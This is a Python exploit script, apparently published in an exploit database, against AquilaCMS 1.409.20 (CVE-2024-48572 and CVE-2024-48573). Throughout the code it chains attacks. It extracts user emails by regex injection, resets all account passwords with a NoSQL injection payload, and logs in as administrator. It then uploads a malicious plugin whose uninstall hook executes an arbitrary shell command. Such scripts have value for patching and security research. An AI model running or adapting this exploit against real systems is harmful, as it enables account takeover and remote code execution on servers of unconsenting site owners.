# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap
def unescape_special_characters(email):
return (
email.replace("[$]", "$")
.replace("[*]", "*")
.replace("[+]", "+")
.replace("[-]", "-")
.replace("[.]", ".")
.replace("[?]", "?")
.replace(r"[\^]", "^")
.replace("[|]", "|")
)
def get_user_emails():
valid_characters = list(
string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
emails_found = []
next_emails = ["^"]
while next_emails:
prev_emails = next_emails
next_emails = []
for email in prev_emails:
found = False
for ch in valid_characters:
data = {"email": f"{email + ch}.*"}
res = requests.put(f"{args.url}/api/v2/user", json=data)
if json.loads(res.text)["code"] == "UserAlreadyExist":
next_emails.append(email + ch)
found = True
if not found:
emails_found.append(email[1:])
print(f"[+] {unescape_special_characters(email[1:])}")
return emails_found
def reset_password(email):
data = {"email": email}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
data = {"token": {"$ne": None}, "password": args.password}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
print(f"[+] {unescape_special_characters(email)} : {args.password}")
def get_admin_auth_token(emails):
for email in emails:
data = {"username": email, "password": args.password}
res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
if res.status_code == 200:
print(f"[+] Administrator account : {unescape_special_characters(email)}")
return json.loads(res.text)["data"]
return None
def create_plugin(plugin_name):
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
/**
* This function is called when the plugin is desactivated or when we delete it
*/
module.exports = async function (resolve, reject) {{
try {{
exec("{args.command}");
return resolve();
}} catch (error) {{}}
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/package.json",
io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
)
zip_file.writestr(
f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
)
plugin.seek(0)
return plugin
def rce(emails):
auth_token = get_admin_auth_token(emails)
if auth_token is None:
print("[-] Administrator account not found")
return
print("[+] Create malicious plugin")
plugin_name = uuid.uuid4().hex
plugin = create_plugin(plugin_name)
print("[+] Upload plugin")
headers = {"Authorization": auth_token}
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
print("[+] Find uploaded plugin")
headers = {"Authorization": auth_token}
data = {"PostBody": {"limit": 0}}
res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
plugin_id = None
for data in json.loads(res.text)["datas"]:
if data["name"] == plugin_name:
plugin_id = data["_id"]
print(f"[+] Plugin ID : {plugin_id}")
break
if plugin_id is None:
print("[-] Plugin not found")
return
print("[+] Deactivate plugin")
headers = {"Authorization": auth_token}
data = {"idModule": plugin_id, "active": False}
res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
def main():
print("[*] Retrieve email addresses")
emails = get_user_emails()
print("\n[*] Reset password")
for email in emails:
reset_password(email)
print("\n[*] Perform remote code execution")
rce(emails)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.aquila-cms.com)",
type=str,
required=True,
)
parser.add_argument(
"-p",
dest="password",
help="Password to use for password reset (e.g. HaXX0r3d!)",
type=str,
default="HaXX0r3d!",
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()